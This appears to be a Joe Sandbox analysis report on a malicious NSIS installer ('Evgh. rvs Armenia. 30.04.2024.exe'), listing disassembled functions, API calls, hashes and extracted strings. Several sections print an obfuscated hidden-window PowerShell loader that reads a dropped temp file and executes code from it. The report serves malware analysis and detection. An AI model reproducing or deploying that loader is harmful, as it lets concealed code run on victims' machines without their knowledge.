                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$hA
                                                  • API String ID: 4283519449-1198886633
                                                  • Opcode ID: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                  • Instruction ID: 8c4c774c716df1ba4ed4283b0a2f2a309b4ff87d1887d614af3d34fab0b2b326
                                                  • Opcode Fuzzy Hash: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                  • Instruction Fuzzy Hash: 5A51B3B1A41214ABDF209F65DE89B9E7AB8EF00355F10403BF904B62D1C7BC9D418BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 487 401751-401774 call 402a3a call 4057dc 492 401776-40177c call 405cfd 487->492 493 40177e-401790 call 405cfd call 40576f lstrcatA 487->493 498 401795-40179b call 405f68 492->498 493->498 503 4017a0-4017a4 498->503 504 4017a6-4017b0 call 406001 503->504 505 4017d7-4017da 503->505 512 4017c2-4017d4 504->512 513 4017b2-4017c0 CompareFileTime 504->513 507 4017e2-4017fe call 405970 505->507 508 4017dc-4017dd call 40594b 505->508 515 401800-401803 507->515 516 401876-40189f call 404f16 call 402e9f 507->516 508->507 512->505 513->512 518 401805-401847 call 405cfd * 2 call 405d1f call 405cfd call 4054f3 515->518 519 401858-401862 call 404f16 515->519 529 4018a1-4018a5 516->529 530 4018a7-4018b3 SetFileTime 516->530 518->503 551 40184d-40184e 518->551 531 40186b-401871 519->531 529->530 534 4018b9-4018c4 FindCloseChangeNotification 529->534 530->534 532 4028d8 531->532 538 4028da-4028de 532->538 536 4018ca-4018cd 534->536 537 4028cf-4028d2 534->537 540 4018e2-4018e5 call 405d1f 536->540 541 4018cf-4018e0 call 405d1f lstrcatA 536->541 537->532 547 4018ea-402273 call 4054f3 540->547 541->547 547->537 547->538 551->531 553 401850-401851 551->553 553->519
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)",C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten,00000000,00000000,00000031), ref: 00401790
                                                  • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)","powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)",C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten,00000000,00000000,00000031), ref: 004017BA
                                                    • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                    • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                    • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "powershell.exe" -windowstyle hidden "$Unlovingness=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Attn104\Jiber\Superintendentens\Chaptaliseringernes.Kro';$Polymer=$Unlovingness.SubString(60937,3);.$Polymer($Unlovingness)"$C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\dompappens\gymnasiast.Lan
                                                  • API String ID: 1941528284-1191785541
                                                  • Opcode ID: 817e87bf3128f809f985f871966ce993f43f09bed9021e4a0421414bc1d6b136
                                                  • Instruction ID: b3254d88aebf37d11d8c7362002191d58d549b74aa0b12ea023da1ca5ce0478c
                                                  • Opcode Fuzzy Hash: 817e87bf3128f809f985f871966ce993f43f09bed9021e4a0421414bc1d6b136
                                                  • Instruction Fuzzy Hash: 7F41C871A04515BADF107BB5CC45EAF3669DF41329F20823BF112F11E2DA3C4A419B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 554 404f16-404f2b 555 404fe1-404fe5 554->555 556 404f31-404f43 554->556 557 404f45-404f49 call 405d1f 556->557 558 404f4e-404f5a lstrlenA 556->558 557->558 560 404f77-404f7b 558->560 561 404f5c-404f6c lstrlenA 558->561 563 404f8a-404f8e 560->563 564 404f7d-404f84 SetWindowTextA 560->564 561->555 562 404f6e-404f72 lstrcatA 561->562 562->560 565 404f90-404fd2 SendMessageA * 3 563->565 566 404fd4-404fd6 563->566 564->563 565->566 566->555 567 404fd8-404fdb 566->567 567->555
                                                  APIs
                                                  • lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                  • lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                  • lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                  • SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: rghtten
                                                  • API String ID: 2531174081-1594702312
                                                  • Opcode ID: 999e89093a23ea19cfb07457cadf61976c7c5e7560eec41fbd50c1d03779383c
                                                  • Instruction ID: eca0c9fc351864773e3873b1aaef0297ce596284c077fb9535b250fc548d2f5f
                                                  • Opcode Fuzzy Hash: 999e89093a23ea19cfb07457cadf61976c7c5e7560eec41fbd50c1d03779383c
                                                  • Instruction Fuzzy Hash: 0D219DB1900119BBDF119FA5CD849DEBFB9EF44354F14807AFA04B6290C7798A41CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 568 402e9f-402eb3 569 402eb5 568->569 570 402ebc-402ec4 568->570 569->570 571 402ec6 570->571 572 402ecb-402ed0 570->572 571->572 573 402ee0-402eed call 40307b 572->573 574 402ed2-402edb call 403091 572->574 578 403032 573->578 579 402ef3-402ef7 573->579 574->573 582 403034-403035 578->582 580 40301b-40301d 579->580 581 402efd-402f1d GetTickCount call 406175 579->581 583 403066-40306a 580->583 584 40301f-403022 580->584 592 403071 581->592 594 402f23-402f2b 581->594 586 403074-403078 582->586 587 403037-40303d 583->587 588 40306c 583->588 589 403024 584->589 590 403027-403030 call 40307b 584->590 595 403042-403050 call 40307b 587->595 596 40303f 587->596 588->592 589->590 590->578 601 40306e 590->601 592->586 598 402f30-402f3e call 40307b 594->598 599 402f2d 594->599 595->578 605 403052-40305e call 405a17 595->605 596->595 598->578 607 402f44-402f4d 598->607 599->598 601->592 610 403060-403063 605->610 611 403017-403019 605->611 609 402f53-402f70 call 406195 607->609 614 403013-403015 609->614 615 402f76-402f8d GetTickCount 609->615 610->583 611->582 614->582 616 402fd2-402fd4 615->616 617 402f8f-402f97 615->617 620 402fd6-402fda 616->620 621 403007-40300b 616->621 618 402f99-402f9d 617->618 619 402f9f-402fca MulDiv wsprintfA call 404f16 617->619 618->616 618->619 626 402fcf 619->626 623 402fdc-402fe1 call 405a17 620->623 624 402fef-402ff5 620->624 621->594 625 403011 621->625 629 402fe6-402fe8 623->629 628 402ffb-402fff 624->628 625->592 626->616 628->609 630 403005 628->630 629->611 631 402fea-402fed 629->631 630->592 631->628
                                                  APIs
                                                  Strings
                                                  • scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighedernelyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewive, xrefs: 00402EC6
                                                  • ... %d%%, xrefs: 00402FB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighedernelyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewive
                                                  • API String ID: 551687249-342867682
                                                  • Opcode ID: ec87ffbb6cf563fd129cc9a73db18b080cea9b7714d42312e3ab62a63da54833
                                                  • Instruction ID: 7e4dc47457cc3da2c56257e898c37067349407ab53618b81eea50406b68a50e3
                                                  • Opcode Fuzzy Hash: ec87ffbb6cf563fd129cc9a73db18b080cea9b7714d42312e3ab62a63da54833
                                                  • Instruction Fuzzy Hash: B9517C72902219ABDF10DF65DA04A9F7BB8EB40755F14413BF800B72C4C7789E51DBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 632 406028-406048 GetSystemDirectoryA 633 40604a 632->633 634 40604c-40604e 632->634 633->634 635 406050-406058 634->635 636 40605e-406060 634->636 635->636 637 40605a-40605c 635->637 638 406061-40608f wsprintfA LoadLibraryA 636->638 637->638
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                  • wsprintfA.USER32 ref: 00406078
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$\
                                                  • API String ID: 2200240437-500877883
                                                  • Opcode ID: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                  • Instruction ID: d5163558ffe5aed4278454506076ff52b4f001f8688a9739bf5e409abac40a62
                                                  • Opcode Fuzzy Hash: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                  • Instruction Fuzzy Hash: C6F0BB7094010A9BDF15DB78DC0DEFB365CEB08304F14057AA547E10D2EA79E975CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 639 40599f-4059a9 640 4059aa-4059d5 GetTickCount GetTempFileNameA 639->640 641 4059e4-4059e6 640->641 642 4059d7-4059d9 640->642 644 4059de-4059e1 641->644 642->640 643 4059db 642->643 643->644
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004059B3
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CD
                                                  Strings
                                                  • "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", xrefs: 0040599F
                                                  • nsa, xrefs: 004059AA
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3986819492
                                                  • Opcode ID: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                  • Instruction ID: 3f05255bf470524d05267fbe77a66a547c73f63e6c4f6eb4cae2c62e5f282410
                                                  • Opcode Fuzzy Hash: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                  • Instruction Fuzzy Hash: D3F0E272708204ABEB108F55EC04B9B7B9CDF91720F10803BFA08DA180D2B098108BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 645 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 652 4023b0-4023b8 645->652 653 4028cf-4028de 645->653 655 4023c8-4023cb 652->655 656 4023ba-4023c7 call 402a3a lstrlenA 652->656 659 4023db-4023de 655->659 660 4023cd-4023da call 402a1d 655->660 656->655 661 4023e0-4023ea call 402e9f 659->661 662 4023ef-402403 RegSetValueExA 659->662 660->659 661->662 667 402405 662->667 668 402408-4024de RegCloseKey 662->668 667->668 668->653
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                  • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                  • RegCloseKey.KERNELBASE(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                  • Instruction ID: 133b3897f1a97e650f74ae2c97eeacc267919fe8998a33790bec377d3be5ae35
                                                  • Opcode Fuzzy Hash: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                  • Instruction Fuzzy Hash: F61163B1E00108BFEB10AFA4DE89EAF7A79EB54358F10403AF505B61D1D6B85D419A28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 796 4015b3-4015c6 call 402a3a call 405808 801 4015c8-4015db call 40579a 796->801 802 40161c-40161f 796->802 809 4015f3-4015f4 call 405459 801->809 810 4015dd-4015e0 801->810 804 401621-40163c call 401423 call 405cfd SetCurrentDirectoryA 802->804 805 40164a-4021c9 call 401423 802->805 817 4028cf-4028de 804->817 822 401642-401645 804->822 805->817 820 4015f9-4015fb 809->820 810->809 814 4015e2-4015e9 call 405476 810->814 814->809 826 4015eb-4015f1 call 4053dc 814->826 824 401612-40161a 820->824 825 4015fd-401602 820->825 822->817 824->801 824->802 828 401604-40160d GetFileAttributesA 825->828 829 40160f 825->829 826->820 828->824 828->829 829->824
                                                  APIs
                                                    • Part of subcall function 00405808: CharNextA.USER32(?,?,00421128,?,00405874,00421128,00421128,75923410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                    • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                    • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                    • Part of subcall function 004053DC: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten,00000000,00000000,000000F0), ref: 00401634
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten, xrefs: 00401629
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten
                                                  • API String ID: 1892508949-258341099
                                                  • Opcode ID: cef5982d16b96abbf50bc7d629446ce069799693c36b8a03ace087d6155603a0
                                                  • Instruction ID: 033a10bc0c18a89e8a0df43fa9022a024a55b03552da94b7695e97ed969a6887
                                                  • Opcode Fuzzy Hash: cef5982d16b96abbf50bc7d629446ce069799693c36b8a03ace087d6155603a0
                                                  • Instruction Fuzzy Hash: BD112B35504141ABDF217B650C409BF37B0E9A2325738463FE582B22D2C63C0943A63F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                  • CloseHandle.KERNEL32(?), ref: 004054C4
                                                  Strings
                                                  • Error launching installer, xrefs: 004054A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                  • Instruction ID: 371522acfb7cd9539d7ae69e543ca64f087bc7c9f75cc5940c594e3c03f6d28b
                                                  • Opcode Fuzzy Hash: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
